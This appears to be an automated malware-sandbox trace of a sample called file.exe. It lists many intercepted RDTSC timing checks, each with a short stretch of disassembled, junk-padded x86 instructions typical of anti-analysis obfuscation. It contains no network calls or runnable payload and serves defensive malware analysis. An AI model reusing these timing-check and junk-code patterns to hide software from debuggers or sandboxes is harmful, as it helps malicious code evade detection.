Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1361 second address: 79C13BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3650C99DA7h 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+14h], eax 0x00000010 jmp 00007F3650C99DA2h 0x00000015 mov eax, dword ptr [esi+18h] 0x00000018 jmp 00007F3650C99DA0h 0x0000001d mov dword ptr [edx+18h], eax 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 mov dx, si 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+1Ch] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, FBh 0x0000002f push eax 0x00000030 pop edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C13BD second address: 79C1425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3650BE6D85h 0x00000009 and ax, E176h 0x0000000e jmp 00007F3650BE6D81h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+1Ch], eax 0x0000001c jmp 00007F3650BE6D7Ch 0x00000021 mov eax, dword ptr [esi+20h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F3650BE6D7Ch 0x0000002d add si, 9DC8h 0x00000032 jmp 00007F3650BE6D7Bh 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1425 second address: 79C1481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F3650C99DA2h 0x0000000f adc eax, 45CE6358h 0x00000015 jmp 00007F3650C99D9Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [edx+20h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F3650C99DA5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1481 second address: 79C14C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3650BE6D87h 0x00000009 sub ah, 0000007Eh 0x0000000c jmp 00007F3650BE6D89h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+24h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C14C7 second address: 79C14CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C14CB second address: 79C14D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C14D1 second address: 79C14EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C14EC second address: 79C14F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C14F0 second address: 79C155D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3650C99D9Bh 0x00000012 sub ax, 46EEh 0x00000017 jmp 00007F3650C99DA9h 0x0000001c popfd 0x0000001d mov ax, 9277h 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+28h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F3650C99D9Fh 0x0000002d pop ecx 0x0000002e call 00007F3650C99DA9h 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C155D second address: 79C1563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1563 second address: 79C1567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C1567 second address: 79C15E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f pushfd 0x00000010 jmp 00007F3650BE6D87h 0x00000015 add ecx, 4ABFC7BEh 0x0000001b jmp 00007F3650BE6D89h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ecx, dword ptr [esi+2Ch] 0x00000025 pushad 0x00000026 mov di, FD1Eh 0x0000002a popad 0x0000002b mov dword ptr [edx+2Ch], ecx 0x0000002e jmp 00007F3650BE6D85h 0x00000033 mov ax, word ptr [esi+30h] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F3650BE6D7Dh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C15E3 second address: 79C15E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C15E9 second address: 79C15ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C15ED second address: 79C163F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F3650C99D9Fh 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 jmp 00007F3650C99DA6h 0x0000001a mov word ptr [edx+32h], ax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3650C99DA7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C163F second address: 79C168A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F3650BE6D7Bh 0x0000000c jmp 00007F3650BE6D83h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esi+34h] 0x00000018 jmp 00007F3650BE6D86h 0x0000001d mov dword ptr [edx+34h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C168A second address: 79C168E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C168E second address: 79C16AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C16AB second address: 79C16B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C16B1 second address: 79C16C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C16C5 second address: 79C16CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C16CB second address: 79C16D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79C16D0 second address: 79C171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650C99D9Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F36BE0D7DC7h 0x00000012 jmp 00007F3650C99DA6h 0x00000017 or dword ptr [edx+38h], FFFFFFFFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3650C99DA7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0789 second address: 79B07BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, ecx 0x0000000d movzx ecx, dx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3650BE6D81h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B07BA second address: 79B07F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3650C99D9Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3650C99DA7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B07F9 second address: 79B0826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3650BE6D7Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795001B second address: 7950021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7950021 second address: 7950027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7950027 second address: 795002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795002B second address: 7950051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3650BE6D7Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3650BE6D7Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7950051 second address: 7950058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79506CA second address: 795072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3650BE6D7Ah 0x0000000a sbb cl, FFFFFFF8h 0x0000000d jmp 00007F3650BE6D7Bh 0x00000012 popfd 0x00000013 popad 0x00000014 mov ah, 16h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007F3650BE6D84h 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushfd 0x0000002b jmp 00007F3650BE6D7Ch 0x00000030 xor ch, FFFFFFB8h 0x00000033 jmp 00007F3650BE6D7Bh 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7950B69 second address: 7950B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7950B84 second address: 7950BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F3650BE6D7Ch 0x00000013 mov si, C0B1h 0x00000017 pop esi 0x00000018 pushad 0x00000019 mov edx, 47DA8970h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0969 second address: 79A096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A096D second address: 79A0971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0971 second address: 79A0977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0977 second address: 79A0A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3650BE6D7Dh 0x00000011 add cl, FFFFFFB6h 0x00000014 jmp 00007F3650BE6D81h 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3650BE6D87h 0x00000023 xor ecx, 7033E7EEh 0x00000029 jmp 00007F3650BE6D89h 0x0000002e popfd 0x0000002f push esi 0x00000030 pushfd 0x00000031 jmp 00007F3650BE6D87h 0x00000036 xor cx, 4DFEh 0x0000003b jmp 00007F3650BE6D89h 0x00000040 popfd 0x00000041 pop esi 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F3650BE6D7Dh 0x0000004b or al, 00000036h 0x0000004e jmp 00007F3650BE6D81h 0x00000053 popfd 0x00000054 push eax 0x00000055 push edx 0x00000056 mov bx, ax 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980017 second address: 798002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650C99DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798002F second address: 79800F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F3650BE6D84h 0x00000012 pop ecx 0x00000013 call 00007F3650BE6D87h 0x00000018 pushfd 0x00000019 jmp 00007F3650BE6D88h 0x0000001e sub al, FFFFFFA8h 0x00000021 jmp 00007F3650BE6D7Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F3650BE6D86h 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F3650BE6D7Eh 0x00000037 or ch, 00000038h 0x0000003a jmp 00007F3650BE6D7Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 mov bx, 6E5Ah 0x00000045 pop edx 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F3650BE6D88h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79800F4 second address: 79800FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79800FA second address: 7980121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 popad 0x00000011 sub esp, 44h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov di, E8D4h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980121 second address: 79801A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F3650C99DA0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, di 0x00000014 pushfd 0x00000015 jmp 00007F3650C99D9Dh 0x0000001a or ax, 5BA6h 0x0000001f jmp 00007F3650C99DA1h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 mov edi, ecx 0x0000002a mov ch, 6Dh 0x0000002c popad 0x0000002d push ebp 0x0000002e jmp 00007F3650C99DA0h 0x00000033 mov dword ptr [esp], esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F3650C99D9Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79801A2 second address: 79801A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79801A6 second address: 79801AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79801AC second address: 79801BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79801BD second address: 79801F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F3650C99D9Ah 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F3650C99D9Dh 0x0000001a jmp 00007F3650C99D9Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79801F3 second address: 798021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3650BE6D87h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 push eax 0x00000014 push edx 0x00000015 mov di, ax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798021D second address: 7980268 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3650C99DA8h 0x00000008 jmp 00007F3650C99DA5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov dword ptr [esp+24h], 00000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3650C99D9Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980268 second address: 798026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798026E second address: 79802BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock bts dword ptr [edi], 00000000h 0x0000000d jmp 00007F3650C99D9Fh 0x00000012 jc 00007F36C01EBF3Fh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F3650C99DA4h 0x0000001f sbb cx, 6D18h 0x00000024 jmp 00007F3650C99D9Bh 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c mov dx, ax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79802BC second address: 79802D9 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3650BE6D83h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79802D9 second address: 79802DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79802DF second address: 79802E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79802E3 second address: 79802F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3650C99D9Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79802F8 second address: 798030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798030A second address: 7980322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980322 second address: 7980326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980326 second address: 798032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798032A second address: 7980330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980330 second address: 7980336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7980336 second address: 798033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798033A second address: 798034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ebx, 323A99FEh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A08CD second address: 79A08D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A08D3 second address: 79A08D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A08D8 second address: 79A0904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3650BE6D84h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0904 second address: 79A090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A090A second address: 79A0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3650BE6D7Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0923 second address: 79A0929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79A0929 second address: 79A094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3650BE6D84h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0AFA second address: 79B0B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F3650C99DA9h 0x0000000f mov ecx, 06558A67h 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3650C99DA6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0B3E second address: 79B0B73 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3650BE6D82h 0x00000008 jmp 00007F3650BE6D85h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0B73 second address: 79B0B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0B77 second address: 79B0B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79B0B7D second address: 79B0B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
